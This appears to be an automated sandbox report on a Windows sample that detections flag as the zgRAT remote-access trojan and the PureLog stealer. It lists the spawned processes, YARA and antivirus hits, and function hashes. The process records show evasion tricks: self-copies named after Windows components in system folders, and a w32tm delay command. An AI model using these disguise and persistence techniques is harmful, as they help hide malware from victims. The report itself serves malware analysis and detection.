                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:36
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff7c2980000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:37
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\w32tm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    Imagebase:0x7ff7861c0000
                                                    File size:108'032 bytes
                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:38
                                                    Start time:10:42:03
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Imagebase:0xdb0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:39
                                                    Start time:10:42:03
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Imagebase:0x4c0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:40
                                                    Start time:10:42:03
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    Imagebase:0xfd0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 73%, ReversingLabs
                                                    Has exited:true

                                                    General

                                                    Target ID:41
                                                    Start time:10:42:03
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    Imagebase:0x4f0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:42
                                                    Start time:10:42:04
                                                    Start date:03/07/2024
                                                    Path:C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                                    Imagebase:0xf40000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 73%, ReversingLabs
                                                    Has exited:true

                                                    General

                                                    Target ID:43
                                                    Start time:10:42:04
                                                    Start date:03/07/2024
                                                    Path:C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                                    Imagebase:0x200000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:9.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:3
                                                      Total number of Limit Nodes:0
                                                      execution_graph 7186 7ff7c1b8c271 7188 7ff7c1b8c2e6 QueryFullProcessImageNameA 7186->7188 7189 7ff7c1b8c434 7188->7189

                                                      Executed Functions

                                                      Function 00007FF7C1790D78 Relevance: .3, Instructions: 253COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 739 7ff7c1790d78-7ff7c1790dcb call 7ff7c17907d0 742 7ff7c1790dd0-7ff7c1791080 739->742
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69aa94e971946aedb54b8a3618cb6251d8b73b0ac36fc7b403b4d9be8f8ffe2b
                                                      • Instruction ID: 6c36c8dae7a92f561fadcec573d554c7c427d16b71cc80773a305fa4b7cac075
                                                      • Opcode Fuzzy Hash: 69aa94e971946aedb54b8a3618cb6251d8b73b0ac36fc7b403b4d9be8f8ffe2b
                                                      • Instruction Fuzzy Hash: 4091AE75E18A998FE789EB6C88687A9BFE1FF59310F4001BEC049C77D2CAB81419C741
                                                      Function 00007FF7C1B8C271 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317947383.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1b80000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuery
                                                      • String ID:
                                                      • API String ID: 3578328331-0
                                                      • Opcode ID: e0e2ef3b258d237c38e1b63259a31dd01ba6855bf9fbec290f69079e1cf87abf
                                                      • Instruction ID: 610403cacd6693bee26c960f584c0b1c334e72ea9859dad7aa4944f379f8671c
                                                      • Opcode Fuzzy Hash: e0e2ef3b258d237c38e1b63259a31dd01ba6855bf9fbec290f69079e1cf87abf
                                                      • Instruction Fuzzy Hash: 3071B370508A8C8FEB68DF28C8457F977E1FB59311F10427EE84EC7292CB74A9468B91
                                                      Function 00007FF7C1790908 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                      • Instruction ID: 9b4ad1c0e72a6ae5086112e2a43da609e4b6cb73fe4f2b2bdf9a8ea44726b337
                                                      • Opcode Fuzzy Hash: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                      • Instruction Fuzzy Hash: D721A63130CC184FE768EA1CE88ADB977D1EB9932171501BAE58AC7266ED51EC9287C1
                                                      Function 00007FF7C179090D Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b4cabffc17f3ac07f77d0814cde74c502ca2f9e7668fe08ba4fde1bd1fdddb5
                                                      • Instruction ID: 10557bd94a710f5169cf80bc2fa3553f40cf29a8a3b26b0523b8434db191a907
                                                      • Opcode Fuzzy Hash: 9b4cabffc17f3ac07f77d0814cde74c502ca2f9e7668fe08ba4fde1bd1fdddb5
                                                      • Instruction Fuzzy Hash: 53310312E0CA655BE314B7BC649E7F9AB85DF48375F0445BBD04DCA2E3CE28B8818285
                                                      Function 00007FF7C1790998 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a7d208516442bf808329bdbcfdba8f4eba9dae8f4f378f3735dfa66e46b3eb0
                                                      • Instruction ID: d19d2427d533714baaf821ca17ad5fce9636ae112b6ef03b3ba8e6eaab6ddbe8
                                                      • Opcode Fuzzy Hash: 9a7d208516442bf808329bdbcfdba8f4eba9dae8f4f378f3735dfa66e46b3eb0
                                                      • Instruction Fuzzy Hash: 5321D420B28D590FE748B72D945E775B2C6EF9C321F4001B9E80EC33D7DD64AC458295
                                                      Function 00007FF7C1790C25 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c71767bc73bc8f7bf5b917dc86de62bfb5e489caa0a6771dff57e6e71abb75cc
                                                      • Instruction ID: a5045e3f9634ffd78e98a7e884e6ad6aed7d5a91bab3cd872935f17423736fc1
                                                      • Opcode Fuzzy Hash: c71767bc73bc8f7bf5b917dc86de62bfb5e489caa0a6771dff57e6e71abb75cc
                                                      • Instruction Fuzzy Hash: 7F21F03591C7898FE302AF7988482ECBBA4EF46334F5445B6C0449B2D3DA786549CBA1
                                                      Function 00007FF7C1791F88 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02e9e574f22a6fed89f35177cd0d158d964df68b1cdcd09b8d8317c098659122
                                                      • Instruction ID: 8f9787e674a5b66ad752c3a9fa6710f1e2562d19ea4d8e641ed7c75f36bc93d6
                                                      • Opcode Fuzzy Hash: 02e9e574f22a6fed89f35177cd0d158d964df68b1cdcd09b8d8317c098659122
                                                      • Instruction Fuzzy Hash: 5B118632E1C9198EEB64FE3D94496F8A392EF4C331FD401B6D40DD3193DEA968594650
                                                      Function 00007FF7C1791FC9 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8eb7b3f777e70a63fde5cc853af094d1f574193fa831fbabfc2f13f5286eefe3
                                                      • Instruction ID: f9632783ead7badec000c7c79e63bd17a4fcad6254de62bfa84cc3912c54dac0
                                                      • Opcode Fuzzy Hash: 8eb7b3f777e70a63fde5cc853af094d1f574193fa831fbabfc2f13f5286eefe3
                                                      • Instruction Fuzzy Hash: CE11FE31A1840A8FEB54FF29C449BB8A3A2AF59321F9541B5D00DC7293DEA9A8558B50
                                                      Function 00007FF7C1790C38 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5cef0a94a76d7e998151fc5d19cfc5d2ad0c75d262b7f3b7f5d53acff41f27f4
                                                      • Instruction ID: a15e846fa1af57cae6c90f3538bc93ec922523e15d72208cd0461064216900c4
                                                      • Opcode Fuzzy Hash: 5cef0a94a76d7e998151fc5d19cfc5d2ad0c75d262b7f3b7f5d53acff41f27f4
                                                      • Instruction Fuzzy Hash: 4E11AC36A1C7898FE702EB7888492DDBFB0EF46220F5545B6C084DB293E678564987A0
                                                      Function 00007FF7C1796D78 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08f208bbf96b0ffc7dd46c4b05486987e4f73a7ed8241797f227272fcbc23412
                                                      • Instruction ID: fdfe89cf97443e4f6ef5209bfce0bfcbd1f1ffc6c6dddb42a8ec7e14adfbe50a
                                                      • Opcode Fuzzy Hash: 08f208bbf96b0ffc7dd46c4b05486987e4f73a7ed8241797f227272fcbc23412
                                                      • Instruction Fuzzy Hash: 56111B30908A1C8FDB59EF18C894BA8B3A1FB68310F5042B9D04ED3295CB74ADC5CF81
                                                      Function 00007FF7C1790C40 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20c890bc3c067bb6fe9022137797e0247794b2c859587d5de2d864e7b678b807
                                                      • Instruction ID: 6827df8f9422277e6bc8451e7924de6265b56786b7509167b92538d995a36ad7
                                                      • Opcode Fuzzy Hash: 20c890bc3c067bb6fe9022137797e0247794b2c859587d5de2d864e7b678b807
                                                      • Instruction Fuzzy Hash: 38018B3690C7898FE702EB7888582D9BFB0EF46220F1545B6C481DB293D6785648CB90
                                                      Function 00007FF7C1790C48 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 92f3902fbc8db033a28cb47200188c9f54152e186a1d6cf24e156a89b312f117
                                                      • Instruction ID: 1b9469c187a5810d9fd7dfdbcda51948a9fadd6553f7a2ac1a901be382a98857
                                                      • Opcode Fuzzy Hash: 92f3902fbc8db033a28cb47200188c9f54152e186a1d6cf24e156a89b312f117
                                                      • Instruction Fuzzy Hash: F0018C3690C7898FE702EB78C848299BFB0AF06320F1542EAD051DB293E6785A48C790
                                                      Function 00007FF7C1790C50 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd8d964ffb98e61e25fdfb1ea303d384be02734b963183183a2eaac5a4e363e8
                                                      • Instruction ID: 75007f29b25650f75f5d89928687d307915ed90dfd9b5623c51c7618dcdfe358
                                                      • Opcode Fuzzy Hash: cd8d964ffb98e61e25fdfb1ea303d384be02734b963183183a2eaac5a4e363e8
                                                      • Instruction Fuzzy Hash: B1017C3580C7C98FE702EB78884829DBFB0AF06324F1442E6D451DB293EA785A48C751
                                                      Function 00007FF7C1792096 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction ID: ff3f6a01ba89ec7791faf59098130f0f955a6273bef64bef5e651cafb25ca273
                                                      • Opcode Fuzzy Hash: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction Fuzzy Hash: D2F0E131D5840E8BEB64FE29C855BF8B366EB58331F9401BAC40DD3193DEBDA9858B50
                                                      Function 00007FF7C17920CF Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction ID: bc585f53cb95a19b4205754609885cded2c5bd28568238c9dcb5f1eb39e2eeb7
                                                      • Opcode Fuzzy Hash: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction Fuzzy Hash: 36F03031E184098BEB10FE29C849AB8A357AF59370F9041B5C40DD32D7EDADA9498660
                                                      Function 00007FF7C1792B40 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction ID: 278edd2aa508107ed6df67ac48e2af0dcdde818e0e4f5d921451e21bda3221cd
                                                      • Opcode Fuzzy Hash: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction Fuzzy Hash: 20F0A030E0910A4FF744BA35C4143BAA3A09F89330F9400B4C90DD32D3DE28AD458750
                                                      Function 00007FF7C1790B95 Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction ID: b37e2e44050ad3ba8960450219b852bdc4dec10a2534946db370d0d3e8fa6bfd
                                                      • Opcode Fuzzy Hash: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction Fuzzy Hash: 78D0A73012954E8FDA00B73CC8498587BA0EB0F224FE510F1D009C7962C50948658700
                                                      Function 00007FF7C17906AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91bc0a54b5817c7a88aa073bed705f364e1aa4ab80e61e6930a14860e0e2bf16
                                                      • Instruction ID: e3360812ad67157e49a2fe52544bf8d073bf6ab0884494f9f5343ab31dc14ab2
                                                      • Opcode Fuzzy Hash: 91bc0a54b5817c7a88aa073bed705f364e1aa4ab80e61e6930a14860e0e2bf16
                                                      • Instruction Fuzzy Hash: 19C04C06D7B55B01A6553A7F644A0ADE1545BCC734FF51572D50C50093ADCF60DD01B6
                                                      Function 00007FF7C17912E8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction ID: a2c726bdd079fd25279bf8f12db869c6b7d685c9014c091ce17eb88c97277c94
                                                      • Opcode Fuzzy Hash: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction Fuzzy Hash: 2AC04C345518098FCA48FB3DC88591877A0FB1D215BD500A0E409C7271D659DCD5CB41
                                                      Function 00007FF7C1790B18 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction ID: 7283d6c6dc003c9f23fb9fa5fd195916ba60a31d533111801245156e430fd33b
                                                      • Opcode Fuzzy Hash: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction Fuzzy Hash: 1AC04C305118198FCA44FB7DCA8595476A0FB0D225BD501E0E40DC7175E65A9C95C741
                                                      Function 00007FF7C179464B Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb98649dab66eef031d7d131945346077dd7cd5da52cf78b562c4d22e66b36b0
                                                      • Instruction ID: 58080ece71701f421c74593685f0811e8936d0fee9c949b7197cb912b1513361
                                                      • Opcode Fuzzy Hash: bb98649dab66eef031d7d131945346077dd7cd5da52cf78b562c4d22e66b36b0
                                                      • Instruction Fuzzy Hash: E2C04C55E1C81646F6597618441227E48525F95764F9401B4E01D873C7CE4D6A0506CB
                                                      Function 00007FF7C1790548 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction ID: 3f6c1ff9e85a8ada2744b1878be98a4358d47d032d6d5e0a17c7591d60fa8ed7
                                                      • Opcode Fuzzy Hash: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction Fuzzy Hash: 64B01230CB760B81DB28FB730842068F160AF0E239FD006B4D40C41293D8EF50ED4652
                                                      Function 00007FF7C17906D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction ID: d757702dd5d5df1c17d65b41af02f433d9c512b01fedf05a728ebd3ddb10a8d4
                                                      • Opcode Fuzzy Hash: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction Fuzzy Hash: FFB01200C7640F01A544367B0846064F0406B4C230FD40070D80C50083A8CE109C0262
                                                      Function 00007FF7C1790528 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
